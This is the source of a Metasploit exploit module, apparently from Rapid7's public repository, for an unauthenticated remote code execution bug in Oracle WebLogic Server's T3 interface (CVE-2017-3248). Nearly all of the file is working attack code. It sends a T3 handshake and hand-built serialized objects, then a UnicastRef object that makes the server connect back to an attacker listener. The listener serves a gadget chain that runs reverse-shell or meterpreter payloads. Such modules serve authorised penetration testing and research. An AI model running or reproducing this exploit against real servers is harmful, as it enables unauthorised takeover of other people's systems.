CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Remote7Rank = ExcellentRanking89include Msf::Exploit::Remote::Tcp10include Msf::Exploit::Remote::TcpServer11#include Msf::Exploit::Remote::HttpClient12include Msf::Exploit::Powershell1314def initialize(info={})15super(update_info(info,16'Name' => 'Oracle Weblogic Server Deserialization RCE - RMI UnicastRef',17'Description' => %q{18An unauthenticated attacker with network access to the Oracle Weblogic Server T319interface can send a serialized object (sun.rmi.server.UnicastRef)20to the interface to execute code on vulnerable hosts.21},22'Author' =>23[24'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com)25'Jacob Baines', # Vulnerability Discovery - Tenable Network Security26'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs27],28'License' => MSF_LICENSE,29'References' =>30[31['CVE', '2017-3248']32],33'Privileged' => false,34'Platform' => %w{ unix win solaris },35'Targets' =>36[37[ 'Unix',38'Platform' => 'unix',39'Arch' => ARCH_CMD,40'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},41'Payload' => {42'Encoder' => 'cmd/ifs',43'BadChars' => ' ',44'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}45}46],47[ 'Windows',48'Platform' => 'win',49'Payload' => {},50'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}51],52[ 'Solaris',53'Platform' => 'solaris',54'Arch' => ARCH_CMD,55'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},56'Payload' => {57'Space' => 2048,58'DisableNops' => true,59'Compat' =>60{61'PayloadType' => 'cmd',62'RequiredCmd' => 'generic perl telnet',63}64}65]66],67'DefaultTarget' => 0,68'DefaultOptions' =>69{70'WfsDelay' => 1271},72'DisclosureDate' => '2017-01-25'))7374register_options([Opt::RPORT(7001)])75end7677=begin This check is currently incompatible with the Tcp mixin. :-(78def check79resp = send_request_cgi(80'method' => 'GET',81'uri' => '/console/login/LoginForm.jsp'82)8384return CheckCode::Unknown unless resp && resp.code == 2008586unless resp.body.include?('Oracle WebLogic Server Administration Console')87vprint_warning("Oracle WebLogic Server banner cannot be found")88return CheckCode::Unknown89end9091/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body92unless version93vprint_warning("Oracle WebLogic Server version cannot be found")94return CheckCode::Unknown95end9697version = Rex::Version.new(version)98vprint_good("Detected Oracle WebLogic Server Version: #{version}")99case100when version.to_s.start_with?('10.3')101return CheckCode::Appears unless version > Rex::Version.new('10.3.6.0')102when version.to_s.start_with?('12.1.3')103return CheckCode::Appears unless version > Rex::Version.new('12.1.3.0')104when version.to_s.start_with?('12.2')105return CheckCode::Appears unless version > Rex::Version.new('12.2.1.1')106end107108return CheckCode::Safe109end110=end111112def gen_resp113if target.name == 'Windows'114pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})115mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join116elsif target.name == 'Unix' || target.name == 'Solaris'117nix_cmd = payload.encoded118mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join119end120121serialized_cmd = (mycmd.length >> 1).to_s(16).rjust(4,'0')122serialized_cmd << mycmd123124# Response data taken from JRMPListener generated data:125# java -cp ysoserial-0.0.5-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 calc.exe126# Modified captured network traffic bytes. Patch in command to run127# TODO: Migrate this functionality to the new JavaDeserialization utilities128@resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'129@resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'130@resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'131@resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'132@resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'133@resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'134@resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'135@resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'136@resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'137@resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'138@resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'139@resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'140@resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'141@resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'142@resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'143@resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'144@resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'145@resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'146@resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'147@resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'148@resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'149@resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'150@resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'151@resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'152@resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'153@resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'154@resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'155@resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'156@resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'157@resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'158@resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'159@resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'160@resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'161@resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'162@resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'163@resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'164@resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'165@resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'166@resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'167@resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'168@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'169@resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'170@resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'171@resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'172@resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'173@resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'174@resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'175@resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'176@resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'177@resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'178@resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'179@resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'180@resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'181@resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'182@resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'183@resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'184@resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'185@resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'186@resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'187@resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'188@resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'189@resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'190@resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'191@resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'192@resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'193@resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'194@resp << '673badd256e7e91d7b470200007078700000000174'195196@resp << serialized_cmd197198@resp << '74'199@resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'200@resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'201@resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'202@resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'203@resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'204@resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'205@resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'206@resp << '7e005a'207end208209def on_client_connect(client)210# Make sure to only sent one meterpreter payload to a host.211# (or as long as the server was listening).212vprint_status("Comparing host: #{client.peerhost}")213if @met_sent.include?(client.peerhost) then return end214@met_sent << client.peerhost215216print_status("Sending payload to client: #{client.peerhost}")217218# Response format determined by watching network traffic219accept_conn = '4e00'220raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join221accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')222accept_conn << raccept_conn223accept_conn << '0000'224accept_conn << client.peerport.to_s(16).rjust(4,'0')225226client.put([accept_conn].pack('H*'))227client.get_once228client.get_once229client.put([@resp].pack('H*'))230client.get_once231232service.close_client(client)233end234235def t3_handshake236# retrieved from network traffic237shake = "t3 12.2.1\n"238shake << "AS:255\n"239shake << "HL:19\n"240shake << "MS:10000000\n\n"241242sock.put(shake)243sleep(1)244sock.get_once245end246247def build_t3_request_object248# T3 request serialized data249# retrieved by watching network traffic250# This is a proprietary, undocumented protocol251data = '000005c3' # lenght of the packet252data << '01' # CMD_IDENTIFY_REQUEST253data << '65' # QOS254data << '01' # Flags:255# CONTEXT_JVMID_FLAG = 1 (has JVMIDs)256# CONTEXT_TX_FLAG = 2257# CONTEXT_TRACE_FLAG = 4258# CONTEXT_EXTENDED_FLAG = 8259# CONTEXT_EXTENDED_USER_FLAG = 16260data << 'ffffffff' # response id261data << 'ffffffff' # invocable id262data << '0000006a' # abbrev offset263data << '0000ea60' # reconnect timeout ??264265# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?266data << '0000001900937b484a56fa4a777666f581daa4f5b9'267data << '0e2aebfc607499b402797372007872017872027870'268data << '0000000a0000000300000000000000060070707070'269data << '70700000000a000000030000000000000006007006'270271data << 'fe010000' # ----- separator -----272273data << 'aced0005' # JSO v5 header274data << '73' # object header275data << '72001d' # className (29 bytes):276data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry277data << '5461626c65456e747279' # (continued)278data << '2f52658157f4f9ed' # serialVersionUID279data << '0c00007870' # remainder of object header280data << '72' # object header281data << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo282data << '65726e616c2e5061636b616765496e666f' # (continued)283data << 'e6f723e7b8ae1ec9' # serialVersionUID284data << '02' # SC_SERIALIZABLE285data << '0008' # fieldCount = 8286data << '4900056d616a6f72' # 0: Int: major287data << '4900056d696e6f72' # 1: Int: minor288data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch289data << '49000b736572766963655061636b' # 3: Int: servicePack290data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch291data << '4c0009696d706c5469746c65' # 5: Obj: implTitle292data << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String293data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor294data << '71007e0003' # (Handle) 0x007e0003295data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion296data << '71007e0003' # (Handle) 0x007e0003297data << '78707702000078' # block footers298299data << 'fe010000' # ----- separator -----300301data << 'aced0005' # JSO v5 header302data << '7372' # object header303data << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry304data << '735461626c65456e747279' # (continued)305data << '2f52658157f4f9ed' # serialVersionUID306data << '0c' # EXTERNALIZABLE | BLOCKDATA307data << '00007870' # remainder of object header308data << '72' # object header309data << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo310data << 'e7465726e616c2e56657273696f6e496e666f' # (continued)311data << '972245516452463e' # serialVersionUID312data << '02' # SC_SERIALIZABLE313data << '0003' # fieldCount = 3314data << '5b0008' # array header (8 bytes)315data << '7061636b61676573' # ARRAY NAME = 'packages'316data << '740027' # TC_STRING className1 (39 bytes)317data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo318data << '6e7465726e616c2f5061636b616765496e666f' # (continued)319data << '3b' # (continued)320data << '4c000e' # object header (14 bytes)321data << '72656c6561736556657273696f6e' # releaseVersion322data << '740012' # TC_STRING (18 bytes)323data << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes324data << '5b0012' # array header (18 bytes)325data << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String;326data << '740002' # TC_STRING (2 bytes)327data << '5b42' # 0x5b42 = [B328data << '78' # block footer329330data << '720024' # class (36 bytes)331data << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo332data << '7465726e616c2e5061636b616765496e666f' # (continued)333data << 'e6f723e7b8ae1ec9' # serialVersionUID334335data << '02' # SC_SERIALIZABLE336data << '0008' # fieldCount = 8337data << '4900056d616a6f72' # 0: Int: major338data << '4900056d696e6f72' # 1: Int: minor339data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch340data << '49000b736572766963655061636b' # 3: Int: servicePack341data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch342data << '4c0009696d706c5469746c65' # 5: Obj: implTitle343data << '71' # TC_REFERENCE344data << '007e0004' # Handle = 0x007e0004345data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor346data << '71' # TC_REFERENCE347data << '007e0004' # Handle = 0x007e0004348data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion349data << '71' # TC_REFERENCE350data << '007e0004' # Handle = 0x007e0004351data << '78' # class footer352data << '70' # TC_NULL353data << '77020000' # BLOCKDATA (2 bytes): 0x0000354data << '78' # block footer355356data << 'fe010000' # ----- separator -----357358data << 'aced0005' # JSO v5 header359data << '73' # object header360data << '72001d' # className (29 bytes):361data << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry362data << '5461626c65456e747279' # (continued)363data << '2f52658157f4f9ed' # serialVersionUID364data << '0c00007870' # remainder of object header365data << '720021' # className (33 bytes)366data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo367data << '65726e616c2e50656572496e666f' # (continued)368data << '585474f39bc908f1' # serialVersionUID369data << '02' # SC_SERIALIZABLE370data << '0006' # fieldCount = 6371data << '4900056d616a6f72' # 0: Int: major372data << '4900056d696e6f72' # 1: Int: minor373data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch374data << '49000b736572766963655061636b' # 3: Int: servicePack375data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch376data << '5b00087061636b61676573' # 5: Array: packages377data << '740027' # TC_STRING (39 bytes)378data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo;379data << '6e7465726e616c2f5061636b616765496e666f' # (continued)380data << '3b' # (continued)381data << '78' # block footer382data << '720024' # class (36 bytes)383data << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Lweblogic/common/internal/PackageInfo;384data << '65726e616c2e56657273696f6e496e666f' # (continued)385data << '972245516452463e' # serialVersionUID386data << '02' # SC_SERIALIZABLE387data << '0003' # fieldCount = 3388data << '5b0008' # 0: Array389data << '7061636b6167657371' # packages390data << '007e0003' # Handle = 0x00730003391data << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion392data << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;393data << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes394data << '740002' # TC_STRING (2 bytes)395data << '5b42' # VALUE = 0x5b42 = [B396data << '78' # block footer397data << '720024' # class: (36 bytes)398data << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo399data << '6e616c2e5061636b616765496e666f' # (continued)400data << 'e6f723e7b8ae1ec9' # serialVersionUID401data << '02' # SC_SERIALIZABLE402data << '0008' # fieldCount = 8403data << '4900056d616a6f72' # 0: Int: major404data << '4900056d696e6f72' # 1: Int: minor405data << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch406data << '49000b736572766963655061636b' # 3: Int: servicePack407data << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch408data << '4c0009696d706c5469746c65' # 5: Obj: implTitle409data << '71' # TC_REFERENCE410data << '007e0005' # Handle = 0x007e0005411data << '4c000a696d706c56656e646f72' # 6: Obj: implVendor412data << '71' # TC_REFERENCE413data << '007e0005' # Handle = 0x007e0005414data << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion415data << '71' # TC_REFERENCE416data << '007e0005' # Handle = 0x007e0005417data << '78' # class footer418data << '707702000078' # block footers419420data << 'fe00ff' # whatever this cruft is again421422data << 'fe010000' # ----- separator -----423424# weblogic.rjvm.JVMID object425data << 'aced0005' # JSO v5 header426data << '73' # object header427data << '720013' # class (19 bytes)428data << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID'429data << 'dc49c23ede121e2a' # serialVersionUID430data << '0c' # EXTERNALIZABLE | BLOCKDATA431data << '0000' # fieldCount = 0 (!!!)432data << '78' # block footer433data << '70' # NULL434data << '7750' # block header (80 bytes)435data << '21' # !436data << '000000000000000000' # 9 NULL BYTES437data << '0d' # \n438#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227439data << '3030302e3030302e3030302e30' # new string = 000.000.000.0440# (must be an IP, and length isn't trivially editable)441data << '00' # \0442data << '12' # strLength = 18 bytes443#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh444data << rand_text_alphanumeric(18).unpack('H*')[0]445data << '83348cd6' # ??? UNKNOWN ??? (Note: Cannot be randomized)446data << '000000070000' # ??? UNKNOWN ???447data << rport.to_s(16).rjust(4, '0') # callback port448data << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ???449data << 'ffffffffff' # ??? UNKNOWN ???450data << '78' # block footer451452data << 'fe010000' # ----- separator -----453454# weblogic.rjvm.JVMID object455data << 'aced0005' # JSO v5 header456data << '73' # object header457data << '72' # class458data << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID459data << 'dc49c23ede121e2a' # serialVersionUID460data << '0c' # EXTERNALIZABLE | BLOCKDATA461data << '0000' # fieldCount = 0462data << '78' # end block463data << '70' # TC_NULL464data << '77' # block header465data << '20' # length = 32 bytes466data << '0114dc42bd071a772700' # ??? UNKNOWN ???467#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS)468data << '0d' # \n469#data << '3234322e3231342e312e323534' # original string = 242.214.1.254470data << '3030302e3030302e3030302e30' # new string = 000.000.000.0471# (must be an IP, and length isn't trivially editable)472#data << '61863d1d' # original string = ??? UNKNOWN ???473data << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized474data << '00000000' # NULL BYTES475data << '78' # block footer476477sock.put([data].pack('H*'))478sleep(1)479sock.get_once480end481482def send_payload_objdata483shost = srvhost484if ['0.0.0.0', '127.0.0.1', '::'].include?(shost)485shost = Rex::Socket.source_address486end487488# JRMPClient payload generated from ysoserial:489# Patch in srvhost and srvport490# TODO: Migrate this functionality to the new JavaDeserialization utilities491payload = '056508000000010000001b0000005d0101007372017870737202787000000000'492payload << '00000000757203787000000000787400087765626c6f67696375720478700000'493payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'494495payload << 'fe010000' # ----- separator -----496497payload << 'aced0005' # JSO v5 header498payload << '73' # object header499payload << '72' # class500payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry501payload << '73735461626c65456e747279' # (cont)502payload << '2f52658157f4f9ed' # serialVersionUID503payload << '0c' # EXTERNALIZABLE | BLOCKDATA504payload << '0000' # fieldCount = 0505payload << '7870' # remaining object header506payload << '72' # class header507payload << '00025b42' # Name: 0x5b42508payload << 'acf317f8060854e0' # serialVersionUID509payload << '02' # SERIALIZABLE510payload << '0000' # fieldCount = 0511payload << '7870' # class footer512payload << '77' # block header513payload << '020000' # contents = 0x0000514payload << '78' # block footer515516payload << 'fe010000' # ----- separator -----517518payload << 'aced0005' # JSO v5 header519payload << '73' # object header520payload << '72' # class521payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry522payload << '73735461626c65456e747279' # (cont)523payload << '2f52658157f4f9ed' # serialVersionUID524payload << '0c' # EXTERNALIZABLE | BLOCKDATA525payload << '0000' # fieldCount = 0526payload << '7870' # remaining object header527payload << '72' # class header528529payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;530payload << '6563743b' # (cont)531payload << '90ce589f1073296c' # serialVersionUID532payload << '02' # SERIALIZABLE533payload << '0000' # fieldCount = 0534payload << '7870' # remaining object header535payload << '77' # block header536payload << '020000' # contents = 0x0000537payload << '78' # block footer538539payload << 'fe010000' # ----- separator -----540541payload << 'aced0005' # JSO v5 header542payload << '73' # object header543payload << '72' # class544545payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry546payload << '73735461626c65456e747279' # (cont)547payload << '2f52658157f4f9ed' # serialVersionUID548payload << '0c' # SERIALIZABLE | BLOCKDATA549payload << '0000' # fieldCount = 0550payload << '7870' # block footer551payload << '72' # class header552payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector553payload << 'd9977d5b803baf01' # serialVersionUID554payload << '03' # WRITE_METHOD | SERIALIZABLE555payload << '0003' # fieldCount = 3556payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement557payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount558payload << '5b000b656c656d656e7444617461' # 2: Array: elementData559payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;560payload << '743b' # (cont)561payload << '7870' # remaining object header562payload << '77' # block header563payload << '020000' # contents = 0x0000564payload << '78' # block footer565566payload << 'fe010000' # ----- separator -----567568# manually generated payload using an UnicastRef object569# needed parameters are patched in runtime570payload << 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265'571payload << '676973747279787200176a6176612e6c616e672e7265666c6563742e50726f78'572payload << '79e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265'573payload << '666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a61'574payload << '76612e726d692e7365727665722e52656d6f74654f626a656374496e766f6361'575payload << '74696f6e48616e646c657200000000000000020200007872001c6a6176612e72'576payload << '6d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300'577payload << '00787077'578# serialize the srvhost manually579unicast_srvhost = shost.each_byte.map { |b| b.to_s(16) }.join580unicast_dat = '000a556e696361737452656600'581unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')582unicast_dat << unicast_srvhost583unicast_dat << '0000'584unicast_dat << srvport.to_s(16).rjust(4,'0')585# unique identifier (for multiple executions)586rand_id = rand(1..65535)587unicast_dat << '000000006133'588unicast_dat << rand_id.to_s(16).rjust(4,'0')589unicast_dat << '00000000000000000000000000000078'590payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')591payload << unicast_dat592593payload << 'fe010000' # ----- separator -----594595# basic weblogic ImmutableServiceContext object (serialized)596payload << 'aced0005' # JSO v5 header597payload << '73' # object header598payload << '72' # class599payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext600payload << '7461626c6553657276696365436f6e74657874' # (cont)601payload << 'ddcba8706386f0ba' # serialVersionUID602payload << '0c' # EXTERNALIZABLE | BLOCKDATA603payload << '0000' # fieldCount = 0604payload << '78' # object footer605payload << '72' # block header606607608payload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext609payload << '696465722e426173696353657276696365436f' # (cont)610payload << '6e74657874' # (cont)611payload << 'e4632236c5d4a71e' # serialVersionUID612payload << '0c' # EXTERNALIZABLE | BLOCKDATA613payload << '0000' # fieldCount = 0614payload << '7870' # block footer615payload << '77' # block header616payload << '020600' # contents = 0x0600617payload << '7372' # class descriptor618payload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor619payload << '726e616c2e4d6574686f644465736372697074' # (cont)620payload << '6f72' # (cont)621payload << '12485a828af7f67b' # serialVersionUID622payload << '0c' # EXTERNALIZABLE | BLOCKDATA623payload << '0000' # fieldCount = 0624payload << '7870' # class footer625payload << '77' # class data626627#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765628#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c629#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b630payload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized631payload << '78' # class footer632payload << '78' # block footer633# MISSING OBJECT FOOTER (0x78)634635payload << 'fe00ff' # this cruft again. some kind of footer636637# sets the length of the stream638data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')639data << payload640641sleep(2)642sock.put([data].pack('H*'))643sleep(2)644sock.get_once645end646647def exploit648@met_sent = []649gen_resp650651connect652653print_status('Sending handshake...')654t3_handshake655656print_status('Sending T3 request object...')657build_t3_request_object658659start_service660661print_status('Sending client object payload...')662send_payload_objdata663664handler665666disconnect667end668end669670671